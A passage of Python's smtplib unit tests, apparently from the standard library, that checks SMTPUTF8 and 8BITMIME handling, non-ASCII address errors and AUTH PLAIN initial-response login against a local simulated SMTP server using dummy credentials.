self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('[email protected]', ['[email protected]'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', '[email protected]'))
message['To'] = email.utils.formataddr(('René', '[email protected]'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], '[email protected]')
self.assertEqual(self.serv._addresses['tos'], ['[email protected]'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
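# SimSMTPUTF8Server advertises SMTPUTF8 and 8BITMIME and records everything it
# receives (peer, envelope addresses, message bytes, MAIL/RCPT options) in
# last_* attributes, so the tests below can assert on exactly what the client
# put on the wire instead of parsing DebuggingServer's printed output.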
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received \r\n to \n, so we can't easily test that
# we are successfully sending \r\n :(.
expected = textwrap.dedent("""\
From: Páolo <fő[email protected]>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'fő[email protected]')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
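# EXPECTED_RESPONSE is the base64 form of an AUTH PLAIN initial response,
# which packs "authorization-id NUL user NUL password" into one blob; here the
# authorization-id is empty, the user is 'psu' and the password is
# 'doesnotexist', matching the credentials the tests below log in with.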
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|